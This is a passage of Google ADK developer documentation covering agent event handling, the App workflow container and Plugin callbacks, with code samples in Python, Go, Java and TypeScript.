System.out.println(" Tool: " + toolName + ", Args: " + arguments); // Application might dispatch execution based on this } } ``` - **Function Response Details:** ```python responses = event.get_function_responses() if responses: for response in responses: tool_name = response.name result_dict = response.response # The dictionary returned by the tool print(f" Tool Result: {tool_name} -> {result_dict}") ``` ```go import ( "fmt" "google.golang.org/adk/session" "google.golang.org/genai" ) func 
handleFunctionResponses(event *session.Event) { if event.LLMResponse == nil || event.LLMResponse.Content == nil { return } responses := event.Content.FunctionResponses() if len(responses) > 0 { for _, response := range responses { toolName := response.Name result := response.Response fmt.Printf(" Tool Result: %s -> %v\n", toolName, result) } } } ``` ```java import com.google.genai.types.FunctionResponse; import com.google.common.collect.ImmutableList; import java.util.Map; ImmutableList<FunctionResponse> responses = event.functionResponses(); // from Event.java if (!responses.isEmpty()) { for (FunctionResponse response : responses) { String toolName = response.name().get(); Map<String, Object> result = response.response().get(); // Check before getting the response System.out.println(" Tool Result: " + toolName + " -> " + result); } } ``` - **Identifiers:** - `event.id`: Unique ID for this specific event instance. - `event.invocation_id`: ID for the entire user-request-to-final-response cycle this event belongs to. Useful for logging and tracing. ### Detecting Actions and Side Effects The `event.actions` object signals changes that occurred or should occur. Always check that `event.actions` and its fields or methods exist before accessing them. - **State Changes:** Gives you a collection of key-value pairs that were modified in the session state during the step that produced this event. `delta = event.actions.state_delta` (a dictionary of `{key: value}` pairs). 
```python
if event.actions and event.actions.state_delta:
    print(f" State changes: {event.actions.state_delta}")
    # Update local UI or application state if necessary
```

`delta := event.Actions.StateDelta` (a `map[string]any`)

```go
import (
	"fmt"

	"google.golang.org/adk/session"
)

func handleStateChanges(event *session.Event) {
	if len(event.Actions.StateDelta) > 0 {
		fmt.Printf(" State changes: %v\n", event.Actions.StateDelta)
		// Update local UI or application state if necessary
	}
}
```

`ConcurrentMap<String, Object> delta = event.actions().stateDelta();`

```java
import java.util.concurrent.ConcurrentMap;
import com.google.adk.events.EventActions;

EventActions actions = event.actions(); // Assuming event.actions() is not null
if (actions != null && actions.stateDelta() != null && !actions.stateDelta().isEmpty()) {
  ConcurrentMap<String, Object> stateChanges = actions.stateDelta();
  System.out.println(" State changes: " + stateChanges);
  // Update local UI or application state if necessary
}
```

- **Artifact Saves:** Gives you a collection indicating which artifacts were saved and their new version number (or relevant `Part` information). `artifact_changes = event.actions.artifact_delta` (a dictionary of `{filename: version}`).
```python
if event.actions and event.actions.artifact_delta:
    print(f" Artifacts saved: {event.actions.artifact_delta}")
    # UI might refresh an artifact list
```

`artifactChanges := event.Actions.ArtifactDelta` (a `map[string]artifact.Artifact`)

```go
import (
	"fmt"

	"google.golang.org/adk/artifact"
	"google.golang.org/adk/session"
)

func handleArtifactChanges(event *session.Event) {
	if len(event.Actions.ArtifactDelta) > 0 {
		fmt.Printf(" Artifacts saved: %v\n", event.Actions.ArtifactDelta)
		// UI might refresh an artifact list
		// Iterate through event.Actions.ArtifactDelta to get filename and artifact.Artifact details
		for filename, art := range event.Actions.ArtifactDelta {
			fmt.Printf(" Filename: %s, Version: %d, MIMEType: %s\n", filename, art.Version, art.MIMEType)
		}
	}
}
```

`ConcurrentMap<String, Part> artifactChanges = event.actions().artifactDelta();`

```java
import java.util.concurrent.ConcurrentMap;
import com.google.genai.types.Part;
import com.google.adk.events.EventActions;

EventActions actions = event.actions(); // Assuming event.actions() is not null
if (actions != null && actions.artifactDelta() != null && !actions.artifactDelta().isEmpty()) {
  ConcurrentMap<String, Part> artifactChanges = actions.artifactDelta();
  System.out.println(" Artifacts saved: " + artifactChanges);
  // UI might refresh an artifact list
  // Iterate through artifactChanges.entrySet() to get filename and Part details
}
```

- **Control Flow Signals:** Check boolean flags or string values:
    - `event.actions.transfer_to_agent` (string): Control should pass to the named agent.
    - `event.actions.escalate` (bool): A loop should terminate.
    - `event.actions.skip_summarization` (bool): A tool result should not be summarized by the LLM.
```python
if event.actions:
    if event.actions.transfer_to_agent:
        print(f" Signal: Transfer to {event.actions.transfer_to_agent}")
    if event.actions.escalate:
        print(" Signal: Escalate (terminate loop)")
    if event.actions.skip_summarization:
        print(" Signal: Skip summarization for tool result")
```

- `event.Actions.TransferToAgent` (string): Control should pass to the named agent.
- `event.Actions.Escalate` (bool): A loop should terminate.
- `event.Actions.SkipSummarization` (bool): A tool result should not be summarized by the LLM.

```go
import (
	"fmt"

	"google.golang.org/adk/session"
)

func handleControlFlow(event *session.Event) {
	if event.Actions.TransferToAgent != "" {
		fmt.Printf(" Signal: Transfer to %s\n", event.Actions.TransferToAgent)
	}
	if event.Actions.Escalate {
		fmt.Println(" Signal: Escalate (terminate loop)")
	}
	if event.Actions.SkipSummarization {
		fmt.Println(" Signal: Skip summarization for tool result")
	}
}
```

- `event.actions().transferToAgent()` (returns `Optional<String>`): Control should pass to the named agent.
- `event.actions().escalate()` (returns `Optional<Boolean>`): A loop should terminate.
- `event.actions().skipSummarization()` (returns `Optional<Boolean>`): A tool result should not be summarized by the LLM.
```java
import com.google.adk.events.EventActions;
import java.util.Optional;

EventActions actions = event.actions(); // Assuming event.actions() is not null
if (actions != null) {
  Optional<String> transferAgent = actions.transferToAgent();
  if (transferAgent.isPresent()) {
    System.out.println(" Signal: Transfer to " + transferAgent.get());
  }

  Optional<Boolean> escalate = actions.escalate();
  if (escalate.orElse(false)) { // or escalate.isPresent() && escalate.get()
    System.out.println(" Signal: Escalate (terminate loop)");
  }

  Optional<Boolean> skipSummarization = actions.skipSummarization();
  if (skipSummarization.orElse(false)) { // or skipSummarization.isPresent() && skipSummarization.get()
    System.out.println(" Signal: Skip summarization for tool result");
  }
}
```

### Determining if an Event is a "Final" Response

Use the built-in helper method `event.is_final_response()` to identify events suitable for display as the agent's complete output for a turn.

- **Purpose:** Filters out intermediate steps (like tool calls, partial streaming text, internal state updates) from the final user-facing message(s).
- **When `True`?**
    1. The event contains a tool result (`function_response`) and `skip_summarization` is `True`.
    1. The event contains a tool call (`function_call`) for a tool marked as `is_long_running=True`. In Java, check that the `longRunningToolIds` list is present and not empty:
        - `event.longRunningToolIds().isPresent() && !event.longRunningToolIds().get().isEmpty()` is `true`.
    1. OR, **all** of the following are met:
        - No function calls (`get_function_calls()` is empty).
        - No function responses (`get_function_responses()` is empty).
        - Not a partial stream chunk (`partial` is not `True`).
        - Doesn't end with a code execution result that might need further processing/display.
- **Usage:** Filter the event stream in your application logic.
```python # Pseudocode: Handling final responses in application (Python) # full_response_text = "" # async for event in runner.run_async(...): # # Accumulate streaming text if needed... # if event.partial and event.content and event.content.parts and event.content.parts[0].text: # full_response_text += event.content.parts[0].text # # # Check if it's a final, displayable event # if event.is_final_response(): # print("\n--- Final Output Detected ---") # if event.content and event.content.parts and event.content.parts[0].text: # # If it's the final part of a stream, use accumulated text # final_text = full_response_text + (event.content.parts[0].text if not event.partial else "") # print(f"Display to user: {final_text.strip()}") # full_response_text = "" # Reset accumulator # elif event.actions and event.actions.skip_summarization and event.get_function_responses(): # # Handle displaying the raw tool result if needed # response_data = event.get_function_responses()[0].response # print(f"Display raw tool result: {response_data}") # elif hasattr(event, 'long_running_tool_ids') and event.long_running_tool_ids: # print("Display message: Tool is running in background...") # else: # # Handle other types of final responses if applicable # print("Display: Final non-textual response or signal.") ``` ```go // Pseudocode: Handling final responses in application (Go) import ( "fmt" "strings" "google.golang.org/adk/session" "google.golang.org/genai" ) // isFinalResponse checks if an event is a final response suitable for display. func isFinalResponse(event *session.Event) bool { if event.LLMResponse != nil { // Condition 1: Tool result with skip summarization. if event.LLMResponse.Content != nil && len(event.LLMResponse.Content.FunctionResponses()) > 0 && event.Actions.SkipSummarization { return true } // Condition 2: Long-running tool call. if len(event.LongRunningToolIDs) > 0 { return true } // Condition 3: A complete message without tool calls or responses. 
if (event.LLMResponse.Content == nil || (len(event.LLMResponse.Content.FunctionCalls()) == 0 && len(event.LLMResponse.Content.FunctionResponses()) == 0)) && !event.LLMResponse.Partial { return true } } return false } func handleFinalResponses() { var fullResponseText strings.Builder // for event := range runner.Run(...) { // Example loop // // Accumulate streaming text if needed... // if event.LLMResponse != nil && event.LLMResponse.Partial && event.LLMResponse.Content != nil { // if len(event.LLMResponse.Content.Parts) > 0 && event.LLMResponse.Content.Parts[0].Text != "" { // fullResponseText.WriteString(event.LLMResponse.Content.Parts[0].Text) // } // } // // // Check if it's a final, displayable event // if isFinalResponse(event) { // fmt.Println("\n--- Final Output Detected ---") // if event.LLMResponse != nil && event.LLMResponse.Content != nil { // if len(event.LLMResponse.Content.Parts) > 0 && event.LLMResponse.Content.Parts[0].Text != "" { // // If it's the final part of a stream, use accumulated text // finalText := fullResponseText.String() // if !event.LLMResponse.Partial { // finalText += event.LLMResponse.Content.Parts[0].Text // } // fmt.Printf("Display to user: %s\n", strings.TrimSpace(finalText)) // fullResponseText.Reset() // Reset accumulator // } // } else if event.Actions.SkipSummarization && event.LLMResponse.Content != nil && len(event.LLMResponse.Content.FunctionResponses()) > 0 { // // Handle displaying the raw tool result if needed // responseData := event.LLMResponse.Content.FunctionResponses()[0].Response // fmt.Printf("Display raw tool result: %v\n", responseData) // } else if len(event.LongRunningToolIDs) > 0 { // fmt.Println("Display message: Tool is running in background...") // } else { // // Handle other types of final responses if applicable // fmt.Println("Display: Final non-textual response or signal.") // } // } // } } ``` ```java // Pseudocode: Handling final responses in application (Java) import com.google.adk.events.Event; 
import com.google.genai.types.Content; import com.google.genai.types.FunctionResponse; import java.util.Map; StringBuilder fullResponseText = new StringBuilder(); runner.run(...).forEach(event -> { // Assuming a stream of events // Accumulate streaming text if needed... if (event.partial().orElse(false) && event.content().isPresent()) { event.content().flatMap(Content::parts).ifPresent(parts -> { if (!parts.isEmpty() && parts.get(0).text().isPresent()) { fullResponseText.append(parts.get(0).text().get()); } }); } // Check if it's a final, displayable event if (event.finalResponse()) { // Using the method from Event.java System.out.println("\n--- Final Output Detected ---"); if (event.content().isPresent() && event.content().flatMap(Content::parts).map(parts -> !parts.isEmpty() && parts.get(0).text().isPresent()).orElse(false)) { // If it's the final part of a stream, use accumulated text String eventText = event.content().get().parts().get().get(0).text().get(); String finalText = fullResponseText.toString() + (event.partial().orElse(false) ? 
"" : eventText); System.out.println("Display to user: " + finalText.trim()); fullResponseText.setLength(0); // Reset accumulator } else if (event.actions() != null && event.actions().skipSummarization().orElse(false) && !event.functionResponses().isEmpty()) { // Handle displaying the raw tool result if needed, // especially if finalResponse() was true due to other conditions // or if you want to display skipped summarization results regardless of finalResponse() Map responseData = event.functionResponses().get(0).response().get(); System.out.println("Display raw tool result: " + responseData); } else if (event.longRunningToolIds().isPresent() && !event.longRunningToolIds().get().isEmpty()) { // This case is covered by event.finalResponse() System.out.println("Display message: Tool is running in background..."); } else { // Handle other types of final responses if applicable System.out.println("Display: Final non-textual response or signal."); } } }); ``` By carefully examining these aspects of an event, you can build robust applications that react appropriately to the rich information flowing through the ADK system. ## How Events Flow: Generation and Processing Events are created at different points and processed systematically by the framework. Understanding this flow helps clarify how actions and history are managed. - **Generation Sources:** - **User Input:** The `Runner` typically wraps initial user messages or mid-conversation inputs into an `Event` with `author='user'`. - **Agent Logic:** Agents (`BaseAgent`, `LlmAgent`) explicitly `yield Event(...)` objects (setting `author=self.name`) to communicate responses or signal actions. - **LLM Responses:** The ADK model integration layer translates raw LLM output (text, function calls, errors) into `Event` objects, authored by the calling agent. - **Tool Results:** After a tool executes, the framework generates an `Event` containing the `function_response`. 
The `author` is typically the agent that requested the tool, while the `role` inside the `content` is set to `'user'` for the LLM history. - **Processing Flow:** 1. **Yield/Return:** An event is generated and yielded (Python) or returned/emitted (Java) by its source. 1. **Runner Receives:** The main `Runner` executing the agent receives the event. 1. **SessionService Processing:** The `Runner` sends the event to the configured `SessionService`. This is a critical step: - **Applies Deltas:** The service merges `event.actions.state_delta` into `session.state` and updates internal records based on `event.actions.artifact_delta`. (Note: The actual artifact *saving* usually happened earlier when `context.save_artifact` was called). - **Finalizes Metadata:** Assigns a unique `event.id` if not present, may update `event.timestamp`. - **Persists to History:** Appends the processed event to the `session.events` list. 1. **External Yield:** The `Runner` yields (Python) or returns/emits (Java) the processed event outwards to the calling application (e.g., the code that invoked `runner.run_async`). This flow ensures that state changes and history are consistently recorded alongside the communication content of each event. ## Common Event Examples (Illustrative Patterns) Here are concise examples of typical events you might see in the stream: - **User Input:** ```json { "author": "user", "invocation_id": "e-xyz...", "content": {"parts": [{"text": "Book a flight to London for next Tuesday"}]} // actions usually empty } ``` - **Agent Final Text Response:** (`is_final_response() == True`) ```json { "author": "TravelAgent", "invocation_id": "e-xyz...", "content": {"parts": [{"text": "Okay, I can help with that. Could you confirm the departure city?"}]}, "partial": false, "turn_complete": true // actions might have state delta, etc. 
} ``` - **Agent Streaming Text Response:** (`is_final_response() == False`) ```json { "author": "SummaryAgent", "invocation_id": "e-abc...", "content": {"parts": [{"text": "The document discusses three main points:"}]}, "partial": true, "turn_complete": false } // ... more partial=True events follow ... ``` - **Tool Call Request (by LLM):** (`is_final_response() == False`) ```json { "author": "TravelAgent", "invocation_id": "e-xyz...", "content": {"parts": [{"function_call": {"name": "find_airports", "args": {"city": "London"}}}]} // actions usually empty } ``` - **Tool Result Provided (to LLM):** (`is_final_response()` depends on `skip_summarization`) ```json { "author": "TravelAgent", // Author is agent that requested the call "invocation_id": "e-xyz...", "content": { "role": "user", // Role for LLM history "parts": [{"function_response": {"name": "find_airports", "response": {"result": ["LHR", "LGW", "STN"]}}}] } // actions might have skip_summarization=True } ``` - **State/Artifact Update Only:** (`is_final_response() == False`) ```json { "author": "InternalUpdater", "invocation_id": "e-def...", "content": null, "actions": { "state_delta": {"user_status": "verified"}, "artifact_delta": {"verification_doc.pdf": 2} } } ``` - **Agent Transfer Signal:** (`is_final_response() == False`) ```json { "author": "OrchestratorAgent", "invocation_id": "e-789...", "content": {"parts": [{"function_call": {"name": "transfer_to_agent", "args": {"agent_name": "BillingAgent"}}}]}, "actions": {"transfer_to_agent": "BillingAgent"} // Added by framework } ``` - **Loop Escalation Signal:** (`is_final_response() == False`) ```json { "author": "CheckerAgent", "invocation_id": "e-loop...", "content": {"parts": [{"text": "Maximum retries reached."}]}, // Optional content "actions": {"escalate": true} } ``` ## Additional Context and Event Details Beyond the core concepts, here are a few specific details about context and events that are important for certain use cases: 1. 
**`ToolContext.function_call_id` (Linking Tool Actions):** - When an LLM requests a tool (FunctionCall), that request has an ID. The `ToolContext` provided to your tool function includes this `function_call_id`. - **Importance:** This ID is crucial for linking actions like authentication back to the specific tool request that initiated them, especially if multiple tools are called in one turn. The framework uses this ID internally. 1. **How State/Artifact Changes are Recorded:** - When you modify state or save an artifact using `CallbackContext` or `ToolContext`, these changes aren't immediately written to persistent storage. - Instead, they populate the `state_delta` and `artifact_delta` fields within the `EventActions` object. - This `EventActions` object is attached to the *next event* generated after the change (e.g., the agent's response or a tool result event). - The `SessionService.append_event` method reads these deltas from the incoming event and applies them to the session's persistent state and artifact records. This ensures changes are tied chronologically to the event stream. 1. **State Scope Prefixes (`app:`, `user:`, `temp:`):** - When managing state via `context.state`, you can optionally use prefixes: - `app:my_setting`: Suggests state relevant to the entire application (requires a persistent `SessionService`). - `user:user_preference`: Suggests state relevant to the specific user across sessions (requires a persistent `SessionService`). - `temp:intermediate_result` or no prefix: Typically session-specific or temporary state for the current invocation. - The underlying `SessionService` determines how these prefixes are handled for persistence. 1. **Error Events:** - An `Event` can represent an error. Check the `event.error_code` and `event.error_message` fields (inherited from `LlmResponse`). - Errors might originate from the LLM (e.g., safety filters, resource limits) or potentially be packaged by the framework if a tool fails critically. 
Check tool `FunctionResponse` content for typical tool-specific errors.

```json
// Example Error Event (conceptual)
{
  "author": "LLMAgent",
  "invocation_id": "e-err...",
  "content": null,
  "error_code": "SAFETY_FILTER_TRIGGERED",
  "error_message": "Response blocked due to safety settings.",
  "actions": {}
}
```

These details provide a more complete picture for advanced use cases involving tool authentication, state persistence scope, and error handling within the event stream.

## Best Practices for Working with Events

To use events effectively in your ADK applications:

- **Clear Authorship:** When building custom agents, ensure correct attribution for agent actions in the history. The framework generally handles authorship correctly for LLM/tool events.
    - Python: Use `yield Event(author=self.name, ...)` in `BaseAgent` subclasses.
    - Go: In custom agent `Run` methods, the framework typically handles authorship. If creating an event manually, set the author: `yield(&session.Event{Author: a.name, ...}, nil)`
    - Java: When constructing an `Event` in your custom agent logic, set the author, for example: `Event.builder().author(this.getAgentName()) // ... .build();`
- **Semantic Content & Actions:** Use `event.content` for the core message/data (text, function call/response). Use `event.actions` specifically for signaling side effects (state/artifact deltas) or control flow (`transfer`, `escalate`, `skip_summarization`).
- **Idempotency Awareness:** Understand that the `SessionService` is responsible for applying the state/artifact changes signaled in `event.actions`. While ADK services aim for consistency, consider potential downstream effects if your application logic re-processes events.
- **Use `is_final_response()`:** Rely on this helper method in your application/UI layer to identify complete, user-facing text responses. Avoid manually replicating its logic.
- **Leverage History:** The session's event list is your primary debugging tool.
Examine the sequence of authors, content, and actions to trace execution and diagnose issues.
- **Use Metadata:** Use `invocation_id` to correlate all events within a single user interaction. Use `event.id` to reference specific, unique occurrences.

Treating events as structured messages with clear purposes for their content and actions is key to building, debugging, and managing complex agent behaviors in ADK.

# Apps: workflow management class

Supported in ADK Python v1.14.0

The ***App*** class is a top-level container for an entire Agent Development Kit (ADK) agent workflow. It is designed to manage the lifecycle, configuration, and state for a collection of agents grouped by a ***root agent***. The **App** class separates the concerns of an agent workflow's overall operational infrastructure from individual agents' task-oriented reasoning.

Defining an ***App*** object in your ADK workflow is optional and changes how you organize your agent code and run your agents. From a practical perspective, you use the ***App*** class to configure the following features for your agent workflow:

- [**Context caching**](/adk-docs/context/caching/)
- [**Context compression**](/adk-docs/context/compaction/)
- [**Agent resume**](/adk-docs/runtime/resume/)
- [**Plugins**](/adk-docs/plugins/)

This guide explains how to use the App class for configuring and managing your ADK agent workflows.

## Purpose of App Class

The ***App*** class addresses several architectural issues that arise when building complex agentic systems:

- **Centralized configuration:** Provides a single, centralized location for managing shared resources like API keys and database clients, avoiding the need to pass configuration down through every agent.
- **Lifecycle management:** The ***App*** class includes ***on startup*** and ***on shutdown*** hooks, which allow for reliable management of persistent resources such as database connection pools or in-memory caches that need to exist across multiple invocations.
- **State scope:** It defines an explicit boundary for application-level state with an `app:*` prefix, making the scope and lifetime of this state clear to developers.
- **Unit of deployment:** The ***App*** concept establishes a formal *deployable unit*, simplifying versioning, testing, and serving of agentic applications.

## Define an App object

The ***App*** class is used as the primary container of your agent workflow and contains the root agent of the project. The ***root agent*** is the container for the primary controller agent and any additional sub-agents.

### Define app with root agent

Create a ***root agent*** for your workflow by creating an instance of the ***Agent*** class. Then define an ***App*** object and configure it with the ***root agent*** object and optional features, as shown in the following sample code:

agent.py

```python
from google.adk.agents.llm_agent import Agent
from google.adk.apps import App

root_agent = Agent(
    model='gemini-2.5-flash',
    name='greeter_agent',
    description='An agent that provides a friendly greeting.',
    instruction='Reply with Hello, World!',
)

app = App(
    name="agents",
    root_agent=root_agent,
    # Optionally include App-level features:
    # plugins, context_cache_config, resumability_config
)
```

Recommended: Use `app` variable name

In your agent project code, set your ***App*** object to the variable name `app` so it is compatible with the ADK command line interface runner tools.
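To illustrate why a fixed variable name matters, the following stdlib-only sketch shows how a command-line tool could locate the entry point of an agent module by convention. The `find_entry_point` helper, the lookup order, and the fallback to `root_agent` are assumptions made for this illustration; this is not the ADK CLI's actual loading code.

```python
from types import SimpleNamespace
from typing import Any


def find_entry_point(module: Any) -> tuple[str, Any]:
    """Return (name, object) for the first conventional attribute on a module.

    Hypothetical lookup order: `app` wins, then `root_agent`.
    """
    for name in ("app", "root_agent"):
        obj = getattr(module, name, None)
        if obj is not None:
            return name, obj
    raise AttributeError("module defines neither 'app' nor 'root_agent'")


# Stand-ins for imported agent modules (plain namespaces, not real ADK objects).
with_app = SimpleNamespace(app="<App object>", root_agent="<Agent object>")
agent_only = SimpleNamespace(root_agent="<Agent object>")
misnamed = SimpleNamespace(my_app="<App object>")

print(find_entry_point(with_app))    # ('app', '<App object>')
print(find_entry_point(agent_only))  # ('root_agent', '<Agent object>')

try:
    find_entry_point(misnamed)
except AttributeError as err:
    print(f"Not discoverable: {err}")
```

In this sketch, an object stored under any other name (such as `my_app`) is simply never found, which is the kind of failure the naming recommendation helps you avoid.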
### Run your App agent

You can use the ***Runner*** class to run your agent workflow using the `app` parameter, as shown in the following code sample:

main.py

```python
import asyncio
from dotenv import load_dotenv
from google.adk.runners import InMemoryRunner
from agent import app  # import code from agent.py

load_dotenv()  # load API keys and settings

# Set a Runner using the imported application object
runner = InMemoryRunner(app=app)


async def main():
    try:
        # run_debug() requires ADK Python 1.18 or higher:
        response = await runner.run_debug("Hello there!")
    except Exception as e:
        print(f"An error occurred during agent execution: {e}")


if __name__ == "__main__":
    asyncio.run(main())
```

Version requirement for `Runner.run_debug()`

The `Runner.run_debug()` command requires ADK Python v1.18.0 or higher. You can also use `Runner.run()`, which requires more setup code. For more details, see the

Run your App agent with the `main.py` code using the following command:

```console
python main.py
```

## Next steps

For a more complete sample code implementation, see the [Hello World App](https://github.com/google/adk-python/tree/main/contributing/samples/hello_world_app) code example.

# Plugins

Supported in ADK Python v1.7.0

A Plugin in Agent Development Kit (ADK) is a custom code module that can be executed at various stages of an agent workflow lifecycle using callback hooks. You use Plugins for functionality that is applicable across your agent workflow. Some typical applications of Plugins are as follows:

- **Logging and tracing**: Create detailed logs of agent, tool, and generative AI model activity for debugging and performance analysis.
- **Policy enforcement**: Implement security guardrails, such as a function that checks if users are authorized to use a specific tool and prevents its execution if they do not have permission.
- **Monitoring and metrics**: Collect and export metrics on token usage, execution times, and invocation counts to monitoring systems such as Prometheus or [Google Cloud Observability](https://cloud.google.com/stackdriver/docs) (formerly Stackdriver). - **Response caching**: Check if a request has been made before, so you can return a cached response, skipping expensive or time consuming AI model or tool calls. - **Request or response modification**: Dynamically add information to AI model prompts or standardize tool output responses. Tip: Use Plugins for safety features When implementing security guardrails and policies, use ADK Plugins for better modularity and flexibility than Callbacks. For more details, see [Callbacks and Plugins for Security Guardrails](/adk-docs/safety/#callbacks-and-plugins-for-security-guardrails). Tip: ADK Integrations For a list of pre-built plugins and other integrations for ADK, see [Tools and Integrations](/adk-docs/integrations/). ## How do Plugins work? An ADK Plugin extends the `BasePlugin` class and contains one or more `callback` methods, indicating where in the agent lifecycle the Plugin should be executed. You integrate Plugins into an agent by registering them in your agent's `Runner` class. For more information on how and where you can trigger Plugins in your agent application, see [Plugin callback hooks](#plugin-callback-hooks). Plugin functionality builds on [Callbacks](https://google.github.io/adk-docs/callbacks/index.md), which is a key design element of the ADK's extensible architecture. While a typical Agent Callback is configured on a *single agent, a single tool* for a *specific task*, a Plugin is registered *once* on the `Runner` and its callbacks apply *globally* to every agent, tool, and LLM call managed by that runner. Plugins let you package related callback functions together to be used across a workflow. 
This makes Plugins an ideal solution for implementing features that cut across your entire agent application. ## Prebuilt Plugins ADK includes several plugins that you can add to your agent workflows immediately: - [**Reflect and Retry Tools**](/adk-docs/plugins/reflect-and-retry/): Tracks tool failures and intelligently retries tool requests. - [**BigQuery Analytics**](/adk-docs/observability/bigquery-agent-analytics/): Enables agent logging and analysis with BigQuery. - [**Context Filter**](https://github.com/google/adk-python/blob/main/src/google/adk/plugins/context_filter_plugin.py): Filters the generative AI context to reduce its size. - [**Global Instruction**](https://github.com/google/adk-python/blob/main/src/google/adk/plugins/global_instruction_plugin.py): Plugin that provides global instructions functionality at the App level. - [**Save Files as Artifacts**](https://github.com/google/adk-python/blob/main/src/google/adk/plugins/save_files_as_artifacts_plugin.py): Saves files included in user messages as Artifacts. - [**Logging**](https://github.com/google/adk-python/blame/main/src/google/adk/plugins/logging_plugin.py): Log important information at each agent workflow callback point. ## Define and register Plugins This section explains how to define Plugin classes and register them as part of your agent workflow. For a complete code example, see [Plugin Basic](https://github.com/google/adk-python/tree/main/contributing/samples/plugin_basic) in the repository. 
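Before writing a real Plugin, it may help to see the registration model from "How do Plugins work?" in miniature. The following stdlib-only sketch contrasts a callback configured on one agent with a plugin registered once on a runner. `MiniAgent`, `CountingPlugin`, and `MiniRunner` are hypothetical stand-ins invented for this illustration and do not use the ADK API; the order in which the plugin hook and the agent callback fire is also just a choice made for the sketch.

```python
from typing import Callable, List, Optional


class MiniAgent:
    """Toy agent with an optional agent-specific callback."""

    def __init__(self, name: str, before_run: Optional[Callable[[str], None]] = None):
        self.name = name
        self.before_run = before_run


class CountingPlugin:
    """Toy plugin: one hook, invoked for every agent the runner executes."""

    def __init__(self) -> None:
        self.agent_count = 0

    def before_agent(self, agent_name: str) -> None:
        self.agent_count += 1


class MiniRunner:
    """Toy runner that applies its registered plugins to all agents."""

    def __init__(self, agents: List[MiniAgent], plugins: List[CountingPlugin]):
        self.agents = agents
        self.plugins = plugins

    def run(self) -> None:
        for agent in self.agents:
            for plugin in self.plugins:  # plugin hooks fire for every agent
                plugin.before_agent(agent.name)
            if agent.before_run:  # agent callback fires only where configured
                agent.before_run(agent.name)


local_calls: List[str] = []
agents = [
    MiniAgent("planner", before_run=local_calls.append),
    MiniAgent("researcher"),
    MiniAgent("writer"),
]
plugin = CountingPlugin()
MiniRunner(agents, plugins=[plugin]).run()

print(plugin.agent_count)  # 3
print(local_calls)         # ['planner']
```

The plugin sees all three agents after a single registration, while the agent-level callback only sees the one agent it was attached to.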
### Create Plugin class

Start by extending the `BasePlugin` class and add one or more `callback` methods, as shown in the following code example:

count_plugin.py

```py
from google.adk.agents.base_agent import BaseAgent
from google.adk.agents.callback_context import CallbackContext
from google.adk.models.llm_request import LlmRequest
from google.adk.plugins.base_plugin import BasePlugin


class CountInvocationPlugin(BasePlugin):
    """A custom plugin that counts agent and tool invocations."""

    def __init__(self) -> None:
        """Initialize the plugin with counters."""
        super().__init__(name="count_invocation")
        self.agent_count: int = 0
        self.tool_count: int = 0
        self.llm_request_count: int = 0

    async def before_agent_callback(
        self, *, agent: BaseAgent, callback_context: CallbackContext
    ) -> None:
        """Count agent runs."""
        self.agent_count += 1
        print(f"[Plugin] Agent run count: {self.agent_count}")

    async def before_model_callback(
        self, *, callback_context: CallbackContext, llm_request: LlmRequest
    ) -> None:
        """Count LLM requests."""
        self.llm_request_count += 1
        print(f"[Plugin] LLM request count: {self.llm_request_count}")
```

count_plugin.ts

```typescript
import { BaseAgent, BasePlugin, CallbackContext } from "@google/adk";
import type { LlmRequest, LlmResponse } from "@google/adk";
import type { Content } from "@google/genai";

/**
 * A custom plugin that counts agent and tool invocations.
 */
export class CountInvocationPlugin extends BasePlugin {
  public agentCount = 0;
  public toolCount = 0;
  public llmRequestCount = 0;

  constructor() {
    super("count_invocation");
  }

  /**
   * Count agent runs.
   */
  async beforeAgentCallback(
    agent: BaseAgent,
    callbackContext: CallbackContext
  ): Promise<Content | undefined> {
    this.agentCount++;
    console.log(`[Plugin] Agent run count: ${this.agentCount}`);
    return undefined;
  }

  /**
   * Count LLM requests.
   */
  async beforeModelCallback(
    callbackContext: CallbackContext,
    llmRequest: LlmRequest
  ): Promise<LlmResponse | undefined> {
    this.llmRequestCount++;
    console.log(`[Plugin] LLM request count: ${this.llmRequestCount}`);
    return undefined;
  }
}
```

This example code implements callbacks for `before_agent_callback` and `before_model_callback` to count execution of these tasks during the lifecycle of the agent.

### Register Plugin class

Integrate your Plugin class by registering it during your agent initialization as part of your `Runner` class, using the `plugins` parameter. You can specify multiple Plugins with this parameter. The following code example shows how to register the `CountInvocationPlugin` plugin defined in the previous section with a simple ADK agent.

```py
from google.adk.runners import InMemoryRunner
from google.adk import Agent
from google.adk.tools.tool_context import ToolContext
from google.genai import types
import asyncio

# Import the plugin.
from .count_plugin import CountInvocationPlugin


async def hello_world(tool_context: ToolContext, query: str):
    print(f'Hello world: query is [{query}]')


root_agent = Agent(
    model='gemini-2.0-flash',
    name='hello_world',
    description='Prints hello world with user query.',
    instruction="""Use hello_world tool to print hello world and user query.
    """,
    tools=[hello_world],
)


async def main():
    """Main entry point for the agent."""
    prompt = 'hello world'
    runner = InMemoryRunner(
        agent=root_agent,
        app_name='test_app_with_plugin',
        # Add your plugin here. You can add multiple plugins.
        plugins=[CountInvocationPlugin()],
    )

    # The rest is the same as starting a regular ADK runner.
    session = await runner.session_service.create_session(
        user_id='user',
        app_name='test_app_with_plugin',
    )

    async for event in runner.run_async(
        user_id='user',
        session_id=session.id,
        new_message=types.Content(
            role='user', parts=[types.Part.from_text(text=prompt)]
        ),
    ):
        print(f'** Got event from {event.author}')


if __name__ == "__main__":
    asyncio.run(main())
```

```typescript
import { InMemoryRunner, LlmAgent, FunctionTool } from "@google/adk";
import type { Content } from "@google/genai";
import { z } from "zod";

// Import the plugin.
import { CountInvocationPlugin } from "./count_plugin.ts";

const HelloWorldInput = z.object({
  query: z.string().describe("The query string to print."),
});

async function helloWorld({ query }: z.infer<typeof HelloWorldInput>): Promise<{ result: string }> {
  const output = `Hello world: query is [${query}]`;
  console.log(output);
  // Tools should return a string or JSON-compatible object
  return { result: output };
}

const helloWorldTool = new FunctionTool({
  name: "hello_world",
  description: "Prints hello world with user query.",
  parameters: HelloWorldInput,
  execute: helloWorld,
});

const rootAgent = new LlmAgent({
  model: "gemini-2.5-flash",
  name: "hello_world",
  description: "Prints hello world with user query.",
  instruction: `Use hello_world tool to print hello world and user query.`,
  tools: [helloWorldTool],
});

/**
 * Main entry point for the agent.
 */
async function main(): Promise<void> {
  const prompt = "hello world";
  const runner = new InMemoryRunner({
    agent: rootAgent,
    appName: "test_app_with_plugin",
    // Add your plugin here. You can add multiple plugins.
    plugins: [new CountInvocationPlugin()],
  });

  // The rest is the same as starting a regular ADK runner.
